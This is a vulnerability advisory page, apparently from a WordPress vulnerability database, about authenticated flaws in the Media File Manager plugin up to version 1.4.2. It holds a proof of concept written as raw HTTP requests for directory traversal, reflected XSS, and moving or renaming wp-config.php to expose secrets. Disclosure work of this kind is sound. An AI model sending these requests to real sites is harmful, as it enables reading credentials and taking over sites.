Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbPasquale TuriWPVDB-ID:1236335E-EC15-4E43-B9C4-3BA1363E87AF
HistoryNov 05, 2018 - 12:00 a.m.

Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities

2018-11-0500:00:00
Pasquale Turi
wpscan.com
8

0.002 Low

EPSS

Percentile

56.0%

JSON

Following the PoC you can combine the vulnerabilities to obtain PHP code execution and read sensitive file. By default the File Manager can only be used by Administrator users, however, any user role can be configured to use it.

PoC

Diretory Trasversal: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: REDACTED Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Connection: close Cookie: REDACTED action=mrelocator_getdir&dir;=…/…/…/…/…/…/…/etc Reflected XSS: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 Connection: close Cookie: REDACTED action=mrelocator_getdir&dir;=[XSS] Move any file to any dir: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 75 Connection: close Cookie: REDACTED action=mrelocator_move&dir;_from=…/…/&dir;_to=…/…/…/&items;=wp-config.php Rename any file: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 97 Connection: close Cookie: REDACTED action=mrelocator_rename&dir;=…/…/&from;=wp-config.php&to;=wp-config.txt

CPENameOperatorVersion
media-file-managereq*

Related

wpexploit 1
openvas 1
cvelist 4
prion 4
nvd 4
cve 4
wpexploit
wpexploit
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
2018-11-05 00:00:00
openvas
openvas
WordPress Media File Manager Plugin < 1.4.4 Multiple Vulnerabilities
2019-03-06 00:00:00
cvelist
cvelist
CVE-2018-19042
2019-01-31 19:00:00
CVE-2018-19041
2019-01-31 19:00:00
CVE-2018-19040
2019-01-31 19:00:00
prion
prion
Directory traversal
2019-01-31 19:29:00
Directory traversal
2019-01-31 19:29:00
Design/Logic Flaw
2019-01-31 19:29:00
nvd
nvd
CVE-2018-19041
2019-01-31 19:29:00
CVE-2018-19042
2019-01-31 19:29:00
CVE-2018-19040
2019-01-31 19:29:00
cve
cve
CVE-2018-19040
2019-01-31 19:29:00
CVE-2018-19042
2019-01-31 19:29:00
CVE-2018-19041
2019-01-31 19:29:00

0.002 Low

EPSS

Percentile

56.0%

JSON
Related for WPVDB-ID:1236335E-EC15-4E43-B9C4-3BA1363E87AF
wpexploit1openvas1cvelist4prion4nvd4cve4